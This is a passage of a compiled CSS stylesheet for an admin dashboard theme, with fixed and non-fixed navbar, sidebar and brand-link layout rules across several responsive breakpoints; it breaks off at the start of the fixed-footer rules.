.layout-navbar-fixed.sidebar-mini-md.sidebar-collapse .wrapper .brand-link {
height: calc(3.5rem + 1px);
width: 4.6rem;
}
.layout-navbar-fixed.sidebar-mini.sidebar-collapse .wrapper .brand-link.text-sm,
.layout-navbar-fixed.sidebar-mini-md.sidebar-collapse .wrapper .brand-link.text-sm {
height: calc(2.93725rem + 1px);
}
.layout-navbar-fixed.sidebar-mini.sidebar-collapse.text-sm .wrapper .brand-link,
.layout-navbar-fixed.sidebar-mini-md.sidebar-collapse.text-sm .wrapper .brand-link {
height: calc(2.93725rem + 1px);
}
body:not(.layout-fixed).layout-navbar-fixed .wrapper .main-sidebar {
margin-top: calc(calc(3.5rem + 1px) / -1);
}
body:not(.layout-fixed).layout-navbar-fixed .wrapper .main-sidebar .sidebar {
margin-top: calc(3.5rem + 1px);
}
body:not(.layout-fixed).layout-navbar-fixed.text-sm .wrapper .main-sidebar {
margin-top: calc(calc(2.93725rem + 1px) / -1);
}
body:not(.layout-fixed).layout-navbar-fixed.text-sm .wrapper .main-sidebar .sidebar {
margin-top: calc(2.93725rem + 1px);
}
.layout-navbar-fixed .wrapper .control-sidebar {
top: 0;
}
.layout-navbar-fixed .wrapper a.anchor {
display: block;
position: relative;
top: calc((3.5rem + 1px + (0.5rem * 2)) / -1);
}
.layout-navbar-fixed .wrapper .main-sidebar:hover .brand-link {
transition: width 0.3s ease-in-out;
width: 250px;
}
.layout-navbar-fixed .wrapper .brand-link {
overflow: hidden;
position: fixed;
top: 0;
transition: width 0.3s ease-in-out;
width: 250px;
z-index: 1035;
}
.layout-navbar-fixed .wrapper .sidebar-dark-primary .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-navbar-fixed .wrapper .sidebar-light-primary .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-navbar-fixed .wrapper .sidebar-dark-secondary .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-navbar-fixed .wrapper .sidebar-light-secondary .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-navbar-fixed .wrapper .sidebar-dark-success .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-navbar-fixed .wrapper .sidebar-light-success .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-navbar-fixed .wrapper .sidebar-dark-info .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-navbar-fixed .wrapper .sidebar-light-info .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-navbar-fixed .wrapper .sidebar-dark-warning .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-navbar-fixed .wrapper .sidebar-light-warning .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-navbar-fixed .wrapper .sidebar-dark-danger .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-navbar-fixed .wrapper .sidebar-light-danger .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-navbar-fixed .wrapper .sidebar-dark-light .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-navbar-fixed .wrapper .sidebar-light-light .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-navbar-fixed .wrapper .sidebar-dark-dark .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-navbar-fixed .wrapper .sidebar-light-dark .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-navbar-fixed .wrapper .content-wrapper {
margin-top: calc(3.5rem + 1px);
}
.layout-navbar-fixed .wrapper .main-header.text-sm ~ .content-wrapper {
margin-top: calc(2.93725rem + 1px);
}
.layout-navbar-fixed .wrapper .main-header {
left: 0;
position: fixed;
right: 0;
top: 0;
z-index: 1033;
}
.layout-navbar-fixed.text-sm .wrapper .content-wrapper {
margin-top: calc(2.93725rem + 1px);
}
.layout-navbar-not-fixed .wrapper .brand-link {
position: static;
}
.layout-navbar-not-fixed .wrapper .sidebar,
.layout-navbar-not-fixed .wrapper .content-wrapper {
margin-top: 0;
}
.layout-navbar-not-fixed .wrapper .main-header {
position: static;
}
.layout-navbar-not-fixed.layout-fixed .wrapper .sidebar {
margin-top: 0;
}
.layout-navbar-fixed.layout-fixed .wrapper .control-sidebar {
top: calc(3.5rem + 1px);
}
.text-sm .layout-navbar-fixed.layout-fixed .wrapper .main-header ~ .control-sidebar,
.layout-navbar-fixed.layout-fixed .wrapper .main-header.text-sm ~ .control-sidebar {
top: calc(2.93725rem + 1px);
}
.layout-navbar-fixed.layout-fixed .wrapper .sidebar {
margin-top: calc(3.5rem + 1px);
}
.text-sm .layout-navbar-fixed.layout-fixed .wrapper .brand-link ~ .sidebar,
.layout-navbar-fixed.layout-fixed .wrapper .brand-link.text-sm ~ .sidebar {
margin-top: calc(2.93725rem + 1px);
}
.layout-navbar-fixed.layout-fixed.text-sm .wrapper .control-sidebar {
top: calc(2.93725rem + 1px);
}
.layout-navbar-fixed.layout-fixed.text-sm .wrapper .sidebar {
margin-top: calc(2.93725rem + 1px);
}
.layout-navbar-fixed .wrapper .control-sidebar {
top: 0;
}
.layout-navbar-fixed .wrapper a.anchor {
display: block;
position: relative;
top: calc((3.5rem + 1px + (0.5rem * 2)) / -1);
}
.layout-navbar-fixed .wrapper.sidebar-collapse .brand-link {
height: calc(3.5rem + 1px);
transition: width 0.3s ease-in-out;
width: 4.6rem;
}
.text-sm .layout-navbar-fixed .wrapper.sidebar-collapse .brand-link, .layout-navbar-fixed .wrapper.sidebar-collapse .brand-link.text-sm {
height: calc(2.93725rem + 1px);
}
.layout-navbar-fixed .wrapper.sidebar-collapse .main-sidebar:hover .brand-link {
transition: width 0.3s ease-in-out;
width: 250px;
}
.layout-navbar-fixed .wrapper .brand-link {
overflow: hidden;
position: fixed;
top: 0;
transition: width 0.3s ease-in-out;
width: 250px;
z-index: 1035;
}
.layout-navbar-fixed .wrapper .sidebar-dark-primary .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-navbar-fixed .wrapper .sidebar-light-primary .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-navbar-fixed .wrapper .sidebar-dark-secondary .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-navbar-fixed .wrapper .sidebar-light-secondary .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-navbar-fixed .wrapper .sidebar-dark-success .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-navbar-fixed .wrapper .sidebar-light-success .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-navbar-fixed .wrapper .sidebar-dark-info .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-navbar-fixed .wrapper .sidebar-light-info .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-navbar-fixed .wrapper .sidebar-dark-warning .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-navbar-fixed .wrapper .sidebar-light-warning .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-navbar-fixed .wrapper .sidebar-dark-danger .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-navbar-fixed .wrapper .sidebar-light-danger .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-navbar-fixed .wrapper .sidebar-dark-light .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-navbar-fixed .wrapper .sidebar-light-light .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-navbar-fixed .wrapper .sidebar-dark-dark .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-navbar-fixed .wrapper .sidebar-light-dark .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-navbar-fixed .wrapper .content-wrapper {
margin-top: calc(3.5rem + 1px);
}
.text-sm .layout-navbar-fixed .wrapper .main-header ~ .content-wrapper,
.layout-navbar-fixed .wrapper .main-header.text-sm ~ .content-wrapper {
margin-top: calc(2.93725rem + 1px);
}
.layout-navbar-fixed .wrapper .main-header {
left: 0;
position: fixed;
right: 0;
top: 0;
z-index: 1037;
}
.layout-navbar-fixed.text-sm .wrapper .content-wrapper {
margin-top: calc(2.93725rem + 1px);
}
body:not(.layout-fixed).layout-navbar-fixed .wrapper .main-sidebar {
margin-top: calc(calc(3.5rem + 1px) / -1);
}
body:not(.layout-fixed).layout-navbar-fixed .wrapper .main-sidebar .sidebar {
margin-top: calc(3.5rem + 1px);
}
body:not(.layout-fixed).layout-navbar-fixed.text-sm .wrapper .main-sidebar {
margin-top: calc(calc(2.93725rem + 1px) / -1);
}
body:not(.layout-fixed).layout-navbar-fixed.text-sm .wrapper .main-sidebar .sidebar {
margin-top: calc(2.93725rem + 1px);
}
.layout-navbar-not-fixed .wrapper .brand-link {
position: static;
}
.layout-navbar-not-fixed .wrapper .sidebar,
.layout-navbar-not-fixed .wrapper .content-wrapper {
margin-top: 0;
}
.layout-navbar-not-fixed .wrapper .main-header {
position: static;
}
.layout-navbar-not-fixed.layout-fixed .wrapper .sidebar {
margin-top: 0;
}
@media (min-width: 576px) {
.layout-sm-navbar-fixed.layout-fixed .wrapper .control-sidebar {
top: calc(3.5rem + 1px);
}
.text-sm .layout-sm-navbar-fixed.layout-fixed .wrapper .main-header ~ .control-sidebar,
.layout-sm-navbar-fixed.layout-fixed .wrapper .main-header.text-sm ~ .control-sidebar {
top: calc(2.93725rem + 1px);
}
.layout-sm-navbar-fixed.layout-fixed .wrapper .sidebar {
margin-top: calc(3.5rem + 1px);
}
.text-sm .layout-sm-navbar-fixed.layout-fixed .wrapper .brand-link ~ .sidebar,
.layout-sm-navbar-fixed.layout-fixed .wrapper .brand-link.text-sm ~ .sidebar {
margin-top: calc(2.93725rem + 1px);
}
.layout-sm-navbar-fixed.layout-fixed.text-sm .wrapper .control-sidebar {
top: calc(2.93725rem + 1px);
}
.layout-sm-navbar-fixed.layout-fixed.text-sm .wrapper .sidebar {
margin-top: calc(2.93725rem + 1px);
}
.layout-sm-navbar-fixed .wrapper .control-sidebar {
top: 0;
}
.layout-sm-navbar-fixed .wrapper a.anchor {
display: block;
position: relative;
top: calc((3.5rem + 1px + (0.5rem * 2)) / -1);
}
.layout-sm-navbar-fixed .wrapper.sidebar-collapse .brand-link {
height: calc(3.5rem + 1px);
transition: width 0.3s ease-in-out;
width: 4.6rem;
}
.text-sm .layout-sm-navbar-fixed .wrapper.sidebar-collapse .brand-link, .layout-sm-navbar-fixed .wrapper.sidebar-collapse .brand-link.text-sm {
height: calc(2.93725rem + 1px);
}
.layout-sm-navbar-fixed .wrapper.sidebar-collapse .main-sidebar:hover .brand-link {
transition: width 0.3s ease-in-out;
width: 250px;
}
.layout-sm-navbar-fixed .wrapper .brand-link {
overflow: hidden;
position: fixed;
top: 0;
transition: width 0.3s ease-in-out;
width: 250px;
z-index: 1035;
}
.layout-sm-navbar-fixed .wrapper .sidebar-dark-primary .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-sm-navbar-fixed .wrapper .sidebar-light-primary .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-sm-navbar-fixed .wrapper .sidebar-dark-secondary .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-sm-navbar-fixed .wrapper .sidebar-light-secondary .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-sm-navbar-fixed .wrapper .sidebar-dark-success .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-sm-navbar-fixed .wrapper .sidebar-light-success .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-sm-navbar-fixed .wrapper .sidebar-dark-info .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-sm-navbar-fixed .wrapper .sidebar-light-info .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-sm-navbar-fixed .wrapper .sidebar-dark-warning .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-sm-navbar-fixed .wrapper .sidebar-light-warning .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-sm-navbar-fixed .wrapper .sidebar-dark-danger .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-sm-navbar-fixed .wrapper .sidebar-light-danger .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-sm-navbar-fixed .wrapper .sidebar-dark-light .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-sm-navbar-fixed .wrapper .sidebar-light-light .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-sm-navbar-fixed .wrapper .sidebar-dark-dark .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-sm-navbar-fixed .wrapper .sidebar-light-dark .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-sm-navbar-fixed .wrapper .content-wrapper {
margin-top: calc(3.5rem + 1px);
}
.text-sm .layout-sm-navbar-fixed .wrapper .main-header ~ .content-wrapper,
.layout-sm-navbar-fixed .wrapper .main-header.text-sm ~ .content-wrapper {
margin-top: calc(2.93725rem + 1px);
}
.layout-sm-navbar-fixed .wrapper .main-header {
left: 0;
position: fixed;
right: 0;
top: 0;
z-index: 1037;
}
.layout-sm-navbar-fixed.text-sm .wrapper .content-wrapper {
margin-top: calc(2.93725rem + 1px);
}
body:not(.layout-fixed).layout-sm-navbar-fixed .wrapper .main-sidebar {
margin-top: calc(calc(3.5rem + 1px) / -1);
}
body:not(.layout-fixed).layout-sm-navbar-fixed .wrapper .main-sidebar .sidebar {
margin-top: calc(3.5rem + 1px);
}
body:not(.layout-fixed).layout-sm-navbar-fixed.text-sm .wrapper .main-sidebar {
margin-top: calc(calc(2.93725rem + 1px) / -1);
}
body:not(.layout-fixed).layout-sm-navbar-fixed.text-sm .wrapper .main-sidebar .sidebar {
margin-top: calc(2.93725rem + 1px);
}
.layout-sm-navbar-not-fixed .wrapper .brand-link {
position: static;
}
.layout-sm-navbar-not-fixed .wrapper .sidebar,
.layout-sm-navbar-not-fixed .wrapper .content-wrapper {
margin-top: 0;
}
.layout-sm-navbar-not-fixed .wrapper .main-header {
position: static;
}
.layout-sm-navbar-not-fixed.layout-fixed .wrapper .sidebar {
margin-top: 0;
}
}
@media (min-width: 768px) {
.layout-md-navbar-fixed.layout-fixed .wrapper .control-sidebar {
top: calc(3.5rem + 1px);
}
.text-sm .layout-md-navbar-fixed.layout-fixed .wrapper .main-header ~ .control-sidebar,
.layout-md-navbar-fixed.layout-fixed .wrapper .main-header.text-sm ~ .control-sidebar {
top: calc(2.93725rem + 1px);
}
.layout-md-navbar-fixed.layout-fixed .wrapper .sidebar {
margin-top: calc(3.5rem + 1px);
}
.text-sm .layout-md-navbar-fixed.layout-fixed .wrapper .brand-link ~ .sidebar,
.layout-md-navbar-fixed.layout-fixed .wrapper .brand-link.text-sm ~ .sidebar {
margin-top: calc(2.93725rem + 1px);
}
.layout-md-navbar-fixed.layout-fixed.text-sm .wrapper .control-sidebar {
top: calc(2.93725rem + 1px);
}
.layout-md-navbar-fixed.layout-fixed.text-sm .wrapper .sidebar {
margin-top: calc(2.93725rem + 1px);
}
.layout-md-navbar-fixed .wrapper .control-sidebar {
top: 0;
}
.layout-md-navbar-fixed .wrapper a.anchor {
display: block;
position: relative;
top: calc((3.5rem + 1px + (0.5rem * 2)) / -1);
}
.layout-md-navbar-fixed .wrapper.sidebar-collapse .brand-link {
height: calc(3.5rem + 1px);
transition: width 0.3s ease-in-out;
width: 4.6rem;
}
.text-sm .layout-md-navbar-fixed .wrapper.sidebar-collapse .brand-link, .layout-md-navbar-fixed .wrapper.sidebar-collapse .brand-link.text-sm {
height: calc(2.93725rem + 1px);
}
.layout-md-navbar-fixed .wrapper.sidebar-collapse .main-sidebar:hover .brand-link {
transition: width 0.3s ease-in-out;
width: 250px;
}
.layout-md-navbar-fixed .wrapper .brand-link {
overflow: hidden;
position: fixed;
top: 0;
transition: width 0.3s ease-in-out;
width: 250px;
z-index: 1035;
}
.layout-md-navbar-fixed .wrapper .sidebar-dark-primary .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-md-navbar-fixed .wrapper .sidebar-light-primary .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-md-navbar-fixed .wrapper .sidebar-dark-secondary .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-md-navbar-fixed .wrapper .sidebar-light-secondary .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-md-navbar-fixed .wrapper .sidebar-dark-success .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-md-navbar-fixed .wrapper .sidebar-light-success .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-md-navbar-fixed .wrapper .sidebar-dark-info .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-md-navbar-fixed .wrapper .sidebar-light-info .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-md-navbar-fixed .wrapper .sidebar-dark-warning .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-md-navbar-fixed .wrapper .sidebar-light-warning .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-md-navbar-fixed .wrapper .sidebar-dark-danger .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-md-navbar-fixed .wrapper .sidebar-light-danger .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-md-navbar-fixed .wrapper .sidebar-dark-light .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-md-navbar-fixed .wrapper .sidebar-light-light .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-md-navbar-fixed .wrapper .sidebar-dark-dark .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-md-navbar-fixed .wrapper .sidebar-light-dark .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-md-navbar-fixed .wrapper .content-wrapper {
margin-top: calc(3.5rem + 1px);
}
.text-sm .layout-md-navbar-fixed .wrapper .main-header ~ .content-wrapper,
.layout-md-navbar-fixed .wrapper .main-header.text-sm ~ .content-wrapper {
margin-top: calc(2.93725rem + 1px);
}
.layout-md-navbar-fixed .wrapper .main-header {
left: 0;
position: fixed;
right: 0;
top: 0;
z-index: 1037;
}
.layout-md-navbar-fixed.text-sm .wrapper .content-wrapper {
margin-top: calc(2.93725rem + 1px);
}
body:not(.layout-fixed).layout-md-navbar-fixed .wrapper .main-sidebar {
margin-top: calc(calc(3.5rem + 1px) / -1);
}
body:not(.layout-fixed).layout-md-navbar-fixed .wrapper .main-sidebar .sidebar {
margin-top: calc(3.5rem + 1px);
}
body:not(.layout-fixed).layout-md-navbar-fixed.text-sm .wrapper .main-sidebar {
margin-top: calc(calc(2.93725rem + 1px) / -1);
}
body:not(.layout-fixed).layout-md-navbar-fixed.text-sm .wrapper .main-sidebar .sidebar {
margin-top: calc(2.93725rem + 1px);
}
.layout-md-navbar-not-fixed .wrapper .brand-link {
position: static;
}
.layout-md-navbar-not-fixed .wrapper .sidebar,
.layout-md-navbar-not-fixed .wrapper .content-wrapper {
margin-top: 0;
}
.layout-md-navbar-not-fixed .wrapper .main-header {
position: static;
}
.layout-md-navbar-not-fixed.layout-fixed .wrapper .sidebar {
margin-top: 0;
}
}
@media (min-width: 992px) {
.layout-lg-navbar-fixed.layout-fixed .wrapper .control-sidebar {
top: calc(3.5rem + 1px);
}
.text-sm .layout-lg-navbar-fixed.layout-fixed .wrapper .main-header ~ .control-sidebar,
.layout-lg-navbar-fixed.layout-fixed .wrapper .main-header.text-sm ~ .control-sidebar {
top: calc(2.93725rem + 1px);
}
.layout-lg-navbar-fixed.layout-fixed .wrapper .sidebar {
margin-top: calc(3.5rem + 1px);
}
.text-sm .layout-lg-navbar-fixed.layout-fixed .wrapper .brand-link ~ .sidebar,
.layout-lg-navbar-fixed.layout-fixed .wrapper .brand-link.text-sm ~ .sidebar {
margin-top: calc(2.93725rem + 1px);
}
.layout-lg-navbar-fixed.layout-fixed.text-sm .wrapper .control-sidebar {
top: calc(2.93725rem + 1px);
}
.layout-lg-navbar-fixed.layout-fixed.text-sm .wrapper .sidebar {
margin-top: calc(2.93725rem + 1px);
}
.layout-lg-navbar-fixed .wrapper .control-sidebar {
top: 0;
}
.layout-lg-navbar-fixed .wrapper a.anchor {
display: block;
position: relative;
top: calc((3.5rem + 1px + (0.5rem * 2)) / -1);
}
.layout-lg-navbar-fixed .wrapper.sidebar-collapse .brand-link {
height: calc(3.5rem + 1px);
transition: width 0.3s ease-in-out;
width: 4.6rem;
}
.text-sm .layout-lg-navbar-fixed .wrapper.sidebar-collapse .brand-link, .layout-lg-navbar-fixed .wrapper.sidebar-collapse .brand-link.text-sm {
height: calc(2.93725rem + 1px);
}
.layout-lg-navbar-fixed .wrapper.sidebar-collapse .main-sidebar:hover .brand-link {
transition: width 0.3s ease-in-out;
width: 250px;
}
.layout-lg-navbar-fixed .wrapper .brand-link {
overflow: hidden;
position: fixed;
top: 0;
transition: width 0.3s ease-in-out;
width: 250px;
z-index: 1035;
}
.layout-lg-navbar-fixed .wrapper .sidebar-dark-primary .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-lg-navbar-fixed .wrapper .sidebar-light-primary .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-lg-navbar-fixed .wrapper .sidebar-dark-secondary .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-lg-navbar-fixed .wrapper .sidebar-light-secondary .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-lg-navbar-fixed .wrapper .sidebar-dark-success .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-lg-navbar-fixed .wrapper .sidebar-light-success .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-lg-navbar-fixed .wrapper .sidebar-dark-info .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-lg-navbar-fixed .wrapper .sidebar-light-info .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-lg-navbar-fixed .wrapper .sidebar-dark-warning .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-lg-navbar-fixed .wrapper .sidebar-light-warning .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-lg-navbar-fixed .wrapper .sidebar-dark-danger .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-lg-navbar-fixed .wrapper .sidebar-light-danger .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-lg-navbar-fixed .wrapper .sidebar-dark-light .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-lg-navbar-fixed .wrapper .sidebar-light-light .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-lg-navbar-fixed .wrapper .sidebar-dark-dark .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-lg-navbar-fixed .wrapper .sidebar-light-dark .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-lg-navbar-fixed .wrapper .content-wrapper {
margin-top: calc(3.5rem + 1px);
}
.text-sm .layout-lg-navbar-fixed .wrapper .main-header ~ .content-wrapper,
.layout-lg-navbar-fixed .wrapper .main-header.text-sm ~ .content-wrapper {
margin-top: calc(2.93725rem + 1px);
}
.layout-lg-navbar-fixed .wrapper .main-header {
left: 0;
position: fixed;
right: 0;
top: 0;
z-index: 1037;
}
.layout-lg-navbar-fixed.text-sm .wrapper .content-wrapper {
margin-top: calc(2.93725rem + 1px);
}
body:not(.layout-fixed).layout-lg-navbar-fixed .wrapper .main-sidebar {
margin-top: calc(calc(3.5rem + 1px) / -1);
}
body:not(.layout-fixed).layout-lg-navbar-fixed .wrapper .main-sidebar .sidebar {
margin-top: calc(3.5rem + 1px);
}
body:not(.layout-fixed).layout-lg-navbar-fixed.text-sm .wrapper .main-sidebar {
margin-top: calc(calc(2.93725rem + 1px) / -1);
}
body:not(.layout-fixed).layout-lg-navbar-fixed.text-sm .wrapper .main-sidebar .sidebar {
margin-top: calc(2.93725rem + 1px);
}
.layout-lg-navbar-not-fixed .wrapper .brand-link {
position: static;
}
.layout-lg-navbar-not-fixed .wrapper .sidebar,
.layout-lg-navbar-not-fixed .wrapper .content-wrapper {
margin-top: 0;
}
.layout-lg-navbar-not-fixed .wrapper .main-header {
position: static;
}
.layout-lg-navbar-not-fixed.layout-fixed .wrapper .sidebar {
margin-top: 0;
}
}
@media (min-width: 1200px) {
.layout-xl-navbar-fixed.layout-fixed .wrapper .control-sidebar {
top: calc(3.5rem + 1px);
}
.text-sm .layout-xl-navbar-fixed.layout-fixed .wrapper .main-header ~ .control-sidebar,
.layout-xl-navbar-fixed.layout-fixed .wrapper .main-header.text-sm ~ .control-sidebar {
top: calc(2.93725rem + 1px);
}
.layout-xl-navbar-fixed.layout-fixed .wrapper .sidebar {
margin-top: calc(3.5rem + 1px);
}
.text-sm .layout-xl-navbar-fixed.layout-fixed .wrapper .brand-link ~ .sidebar,
.layout-xl-navbar-fixed.layout-fixed .wrapper .brand-link.text-sm ~ .sidebar {
margin-top: calc(2.93725rem + 1px);
}
.layout-xl-navbar-fixed.layout-fixed.text-sm .wrapper .control-sidebar {
top: calc(2.93725rem + 1px);
}
.layout-xl-navbar-fixed.layout-fixed.text-sm .wrapper .sidebar {
margin-top: calc(2.93725rem + 1px);
}
.layout-xl-navbar-fixed .wrapper .control-sidebar {
top: 0;
}
.layout-xl-navbar-fixed .wrapper a.anchor {
display: block;
position: relative;
top: calc((3.5rem + 1px + (0.5rem * 2)) / -1);
}
.layout-xl-navbar-fixed .wrapper.sidebar-collapse .brand-link {
height: calc(3.5rem + 1px);
transition: width 0.3s ease-in-out;
width: 4.6rem;
}
.text-sm .layout-xl-navbar-fixed .wrapper.sidebar-collapse .brand-link, .layout-xl-navbar-fixed .wrapper.sidebar-collapse .brand-link.text-sm {
height: calc(2.93725rem + 1px);
}
.layout-xl-navbar-fixed .wrapper.sidebar-collapse .main-sidebar:hover .brand-link {
transition: width 0.3s ease-in-out;
width: 250px;
}
.layout-xl-navbar-fixed .wrapper .brand-link {
overflow: hidden;
position: fixed;
top: 0;
transition: width 0.3s ease-in-out;
width: 250px;
z-index: 1035;
}
.layout-xl-navbar-fixed .wrapper .sidebar-dark-primary .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-xl-navbar-fixed .wrapper .sidebar-light-primary .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-xl-navbar-fixed .wrapper .sidebar-dark-secondary .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-xl-navbar-fixed .wrapper .sidebar-light-secondary .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-xl-navbar-fixed .wrapper .sidebar-dark-success .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-xl-navbar-fixed .wrapper .sidebar-light-success .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-xl-navbar-fixed .wrapper .sidebar-dark-info .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-xl-navbar-fixed .wrapper .sidebar-light-info .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-xl-navbar-fixed .wrapper .sidebar-dark-warning .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-xl-navbar-fixed .wrapper .sidebar-light-warning .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-xl-navbar-fixed .wrapper .sidebar-dark-danger .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-xl-navbar-fixed .wrapper .sidebar-light-danger .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-xl-navbar-fixed .wrapper .sidebar-dark-light .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-xl-navbar-fixed .wrapper .sidebar-light-light .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-xl-navbar-fixed .wrapper .sidebar-dark-dark .brand-link:not([class*="navbar"]) {
background-color: #343a40;
}
.layout-xl-navbar-fixed .wrapper .sidebar-light-dark .brand-link:not([class*="navbar"]) {
background-color: #ffffff;
}
.layout-xl-navbar-fixed .wrapper .content-wrapper {
margin-top: calc(3.5rem + 1px);
}
.text-sm .layout-xl-navbar-fixed .wrapper .main-header ~ .content-wrapper,
.layout-xl-navbar-fixed .wrapper .main-header.text-sm ~ .content-wrapper {
margin-top: calc(2.93725rem + 1px);
}
.layout-xl-navbar-fixed .wrapper .main-header {
left: 0;
position: fixed;
right: 0;
top: 0;
z-index: 1037;
}
.layout-xl-navbar-fixed.text-sm .wrapper .content-wrapper {
margin-top: calc(2.93725rem + 1px);
}
body:not(.layout-fixed).layout-xl-navbar-fixed .wrapper .main-sidebar {
margin-top: calc(calc(3.5rem + 1px) / -1);
}
body:not(.layout-fixed).layout-xl-navbar-fixed .wrapper .main-sidebar .sidebar {
margin-top: calc(3.5rem + 1px);
}
body:not(.layout-fixed).layout-xl-navbar-fixed.text-sm .wrapper .main-sidebar {
margin-top: calc(calc(2.93725rem + 1px) / -1);
}
body:not(.layout-fixed).layout-xl-navbar-fixed.text-sm .wrapper .main-sidebar .sidebar {
margin-top: calc(2.93725rem + 1px);
}
.layout-xl-navbar-not-fixed .wrapper .brand-link {
position: static;
}
.layout-xl-navbar-not-fixed .wrapper .sidebar,
.layout-xl-navbar-not-fixed .wrapper .content-wrapper {
margin-top: 0;
}
.layout-xl-navbar-not-fixed .wrapper .main-header {
position: static;
}
.layout-xl-navbar-not-fixed.layout-fixed .wrapper .sidebar {
margin-top: 0;
}
}
.layout-footer-fixed .wrapper .control-sidebar {
bottom: 0;
}
.layout-footer-fixed .wrapper .main-footer {
bottom: 0;
